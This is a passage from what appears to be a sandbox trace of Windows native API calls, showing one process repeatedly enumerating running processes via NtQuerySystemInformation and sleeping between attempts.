NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.444] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.459] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.476] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.506] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.553] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.569] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.584] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.604] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.616] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.631] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.666] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.679] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.694] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.709] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.725] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.740] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.759] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 